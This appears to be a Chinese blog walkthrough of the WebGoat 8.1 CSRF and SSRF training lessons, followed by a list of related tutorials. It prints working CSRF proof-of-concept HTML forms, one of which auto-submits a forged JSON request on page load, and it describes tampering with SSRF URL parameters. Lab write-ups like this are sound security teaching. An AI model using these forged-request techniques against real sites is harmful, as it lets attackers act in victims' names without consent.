WebGoatV8.1(A8 2013Request Forgery)详细过关教程
一、Cross-Site Request Forgeries
1.Basic Get CSRF Exercise
根据题目提示说有隐藏表单,找到代码,右击form标签,复制->整个html
黏贴到编辑器上面并且补全html代码 和action指定的url,保存后修改后缀为html
<html>
<body>
<form accept-charset="UNKNOWN" id="basic-csrf-get" method="POST" name="form1" target="_blank" successcallback="" action="http://192.168.3.88:8080/WebGoat/csrf/basic-get-flag"><input name="csrf" type="hidden" value="false"><input type="submit" name="submit"></form>
</body>
</html>
我这里为了方便没有用http,直接打开编写好的html文件提交,获得flag
2.Post a review on someone else’s behalf
这题和上一题的步骤也差不多
黏贴到编辑器上补齐,后改后缀名
<html>
<body>
<form class="attack-form" accept-charset="UNKNOWN" id="csrf-review" method="POST" name="review-form" successcallback="" action="http://192.168.3.88:8080/WebGoat/csrf/review"><input class="form-control" id="reviewText" name="reviewText" placeholder="a" type="text"><input class="form-control" id="reviewStars" name="stars" type="text"><input type="hidden" name="validateReq" value="2aa14227b9a13d0bede0388a7fba9aa9"><input type="submit" name="submit" value="Submit review"></form>
</body>
</html>
打开后输入,提交。回到webgoat刷新一下,已经有新的评价出现
3.CSRF and content-type
这一题根据题目给出的提交表单进行构造html来提交表单。
而且提交的格式是xml,这里涉及到编码转化的问题,不过题目里面的here跳转的页面已经很好的帮我们解决这个问题,也就是添加一个属性
ENCTYPE="text/plain"
构造的html代码
<html><script>window.onload = function() {document.getElementById("submit").click();}</script> <body> <form class="attack-form" accept-charset="UNKNOWN" id="csrf-feedback" method="POST" preparedata="feedback" action="http://192.168.3.88:8080/WebGoat/csrf/feedback/message" contenttype="application/json" ENCTYPE="text/plain"><input type="hidden" name='{"name": "WebGoat","email":"webgoat@webgoat.org","content":"WebGoat is the best!!' value='"}'><input id="submit" type="submit" value="Submit request" style="display:none"/></form></body>
</html>
二、Server-Side Request Forgery
1.Change the URL to display Jerry
设置代理抓包
url值里面的tom改成jerry,放包。即可过关
2.Change the URL to display the Interface Configuration with ifconfig.pro
让我们改成使用ifconfig.pro接口,我们直接访问ifconfig.pro看看这个接口的整个url。有url就简单了
直接抓包改url的值就可以了
也可以直接在浏览器上面该value值提交
WebGoatV8.1(A8 2013Request Forgery)详细过关教程相关推荐
- WebGoatV8.1(A1Injection)详细过关教程
一.SQL Injection (intro) 1.What is SQL? 题目让我们查找Bob Franco的部门 基本的sql的查询语句:select 查询的字段 from 表名 where 筛 ...
- WebGoatV8.1(A3-A5)详细过关教程
一.Insecure Login 打开代理,点击login,发现登陆的账号和密码没加密,提交可过关. 二.xxe 1.Let's try 设置代理进行抓包,发现我们评论的内容是在用xml进行传递这时候 ...
- WebGoatV8.1(challenges)详细过关教程
一.Admin lost password 设置代理继续抓包,刷新题目本页面.抓取url路径为/WebGoat/challenge/logo的包,重放在回应包里面搜索admin找到账号和密码 登录拿到 ...
- Docker02 狂神Docker视频学习笔记 :【狂神说Java 哔哩哔哩】Docker最新超详细版教程通俗易懂
目录 0. 视频源 0. 学习网址 基础篇 1. Docker概述 1.1 Docker为什么出现? 1.2 Docker历史 1.3 Docker能干什么 2. Docker安装 2.1 Docke ...
- SSM框架——详细整合教程(Spring+SpringMVC+MyBatis)
登录 | 注册 收藏成功 确定 收藏失败,请重新收藏 确定 查看所有私信查看所有通知 暂没有新通知 想要绕过微信小程序开发中的坑吗?不妨来听这个,今晚8点,1小时帮你搞定! 14小时以前 CSDN日报 ...
- mysql为什么每天0点就装东西_MySQL的详细安装教程
1.安装之前需要注意的几点 建议不要安装最新版本,一般找mysql5.0系列版本即可: mysq1官网有.zip和.msi两种安装形式: zip是压缩包,直接解压缩以后使用的,需要自己配置各种东西:m ...
- mysql windows 管道连接,科技常识:Windows Server 2016 MySQL数据库安装配置详细安装教程...
今天小编跟大家讲解下有关Windows Server 2016 MySQL数据库安装配置详细安装教程 ,相信小伙伴们对这个话题应该也很关注吧,小编也收集到了有关Windows Server 2016 ...
- python安装了运行不了_python详细安装教程
本章开始,我们将详细介绍Python编程环境的搭建,工欲善其事必先利其器,所以我们这里先介绍python详细安装教程.由于Python是跨平台的,他可以运行在Windows.Linux.Mac等系统上 ...
- truffle详细使用教程
详细使用教程 选择以太坊客户端 编译智能合约 运行迁移 测试智能合约 用 JavaScript 编写测试脚本 编写 Solidity 测试脚本 与智能合约交互 使用 EthPM 包管理工具 调试智能合 ...
最新文章
- jenkins获取远程服务器文件,Jenkins用SSH传输文件到远程服务器
- mysql杠杆加号什么意思_对tb_book表中的数据,按ID序号进行升序排列,查询语句是什么?_学小易找答案...
- linux c uuid guid 生成
- php web server部署(PHP+Nginx+Redis+MySQL)
- 以太坊、Hyperledger Fabric和Corda,哪个更好?
- ML之k-NN:k-NN实现对150朵共三种花的实例的萼片长度、宽,花瓣长、宽数据统计,根据一朵新花的四个特征来预测其种类
- 【程序员比赛】CISCN 2021 ezj4va与Fix思路
- new fabu
- selenium webdriver学习(八)------------如何操作select下拉框(转)
- 01-eclipse打包运行程序总是报错java.lang.NoClassDefFoundError和ava.lang.ClassNotFoundException(打包原理)
- 低温linux内核启动readl,Linux内核启动流程分析(一)
- 12.Memcached 与 Redis 区别
- 美团猫眼电影Android模块化实战总结
- 武汉加油!爬取百度迁徙地图数据+城市出行强度
- Apple Push Notification service
- 更完美 联想乐Phone获取root权限教程
- Debussy软件简介及仿真教程
- 哈啰电动车,未来可期
- linux驱动开发简单示例
- 程序员必备狂拽炫酷吊炸天的动效神器
热门文章
- idea找不到persistence
- 2020中国云存储(对象存储)服务商TOP20
- root改名字,root重命名
- Eclipse创建类文件时类的名字出错,改名字的方法
- (菜鸟要飞系列)四,基于Asp.Net MVC5的后台管理系统(zTree绑定Json数据生成树)...
- 黑球、白球各100,最后剩下一个是黑球的可能性|编程之美百度腾讯
- ubuntu 18.04安装owncloud 搭建自己的私有云盘
- nRF2401A调试
- ds1302模块 树莓派_Arduino控制DS1302时钟芯片(ds1302引脚图及功能和应用电路)
- 用python从日期中获取年、月、日、星期等30种信息